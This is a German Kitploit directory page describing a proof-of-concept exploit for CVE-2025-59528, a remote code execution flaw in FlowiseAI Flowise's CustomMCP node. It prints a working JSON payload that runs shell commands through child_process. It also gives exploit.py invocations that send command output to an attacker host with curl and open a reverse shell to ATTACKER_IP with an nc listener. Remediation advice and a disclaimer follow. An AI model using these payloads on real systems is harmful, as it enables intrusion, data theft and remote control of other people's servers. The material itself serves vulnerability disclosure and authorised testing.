Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-59528-POC — CVE-2025-59528 - FlowiseAI CustomMCP Remotecodeausführung | Kitploit
Tools/GitHubGitHub/usifaraby/cve-2025-59528-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHubusifaraby/cve-2025-59528-poc

CVE-2025-59528-POC

CVE-2025-59528 - FlowiseAI CustomMCP Remotecodeausführung

Repository anzeigen
11vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-59528 - FlowiseAI CustomMCP Remote Code Execution

CVSS 10.0 (Critical) | Blind RCE | FlowiseAI Flowise >= 2.2.7-patch.1 und < 3.0.6

Überblick

Eine kritische Remote-Code-Execution-Schwachstelle im CustomMCP-Knoten von FlowiseAI Flowise. Die Funktion convertToValidJSONString übergibt benutzergesteuerte Eingaben aus dem Parameter mcpServerConfig direkt an den Function()-Konstruktor von JavaScript, der funktional äquivalent zu eval() ist, wodurch die Ausführung beliebigen JavaScript-Codes mit vollständigen Node.js-Laufzeitprivilegien ermöglicht wird.

  • Entdeckt von: Kim SooHyun (@im-soohyun)
  • Advisory: GHSA-3gcm-f6qx-ff7p
  • Behoben in: Flowise v3.0.6 (Function() wurde durch JSON5.parse() ersetzt)
  • Verwundbarer Code

    In packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts, Zeilen 262–270:

    root@kitploit:~
    function convertToValidJSONString(inputString) {
        return Function('return ' + inputString)();  // ← beliebige Codeausführung
    }
    

    Der Taint-Flow:

    root@kitploit:~
    HTTP POST → /api/v1/node-load-method/customMCP
      → controller.getSingleNodeAsyncOptions()
        → service layer
          → CustomMCP.listActions()
            → convertToValidJSONString(mcpServerConfig)  // Function('return ' + userInput)()
    

    Ausnutzung

    Hierbei handelt es sich um ein blindes RCE – die Befehlsausgabe wird nicht in der HTTP-Antwort widergespiegelt. Verwenden Sie Callback-Techniken (curl/wget) oder eine Reverse Shell, um die Ausführung zu bestätigen.

    Voraussetzungen

    BedingungDetails
    Flowise-Version>= 2.2.7-patch.1, < 3.0.6
    NetzwerkzugriffAPI-Endpunkt auf Port 3000 (Standard)
    AuthentifizierungOptional für < 3.0.1, erforderlich für >= 3.0.1

    Payload

    root@kitploit:~
    {
      "loadMethod": "listActions",
      "inputs": {
        "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
      }
    }
    

    Verwendung

    root@kitploit:~
    pip install requests
    

    Prüfen, ob das Ziel verwundbar ist (zeitbasiert)

    root@kitploit:~
    python3 exploit.py -t http://target:3000 --mode check --email [email protected] --password pass
    

    Blind-Befehlsausführung

    root@kitploit:~
    # Ausgabe per Callback exfiltrieren
    python3 exploit.py -t http://target:3000 --mode exec \
      -c "curl http://ATTACKER:PORT/\$(id | base64)" \
      --email [email protected] --password pass
    

    Reverse Shell

    root@kitploit:~
    # Listener starten
    nc -lvnp 4444
    
    # Exploit ausführen (versucht automatisch bash, nc, python)
    python3 exploit.py -t http://target:3000 --mode revshell \
      --lhost ATTACKER_IP --lport 4444 \
      --email [email protected] --password pass
    

    Authentifizierungsoptionen

    root@kitploit:~
    # JWT-Auth (Flowise >= 3.0.1)
    --email [email protected] --password pass
    
    # Basic Auth (Flowise < 3.0.1 mit FLOWISE_USERNAME-Umgebungsvariable)
    --username admin --password pass
    
    # Raw-Cookie-String (Fallback)
    --cookie "token=eyJ...;refreshToken=eyJ...;connect.sid=s%3A..."
    

    Behebung

    • Upgrade auf Flowise >= 3.0.6 durchführen
    • API-Zugriff per Firewall/VPN einschränken
    • Authentifizierung auf allen Instanzen aktivieren
    • Logs auf POST-Anfragen an /api/v1/node-load-method/customMCP überwachen

    Referenzen

    • NVD — CVE-2025-59528
    • GitHub Advisory — GHSA-3gcm-f6qx-ff7p
    • SonicWall Threat Analysis
    • Fix Commit — Flowise v3.0.6

    Haftungsausschluss

    Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Unbefugter Zugriff auf Computersysteme ist illegal. Holen Sie vor dem Testen stets eine ordnungsgemäße Genehmigung ein.

    Tool herunterladen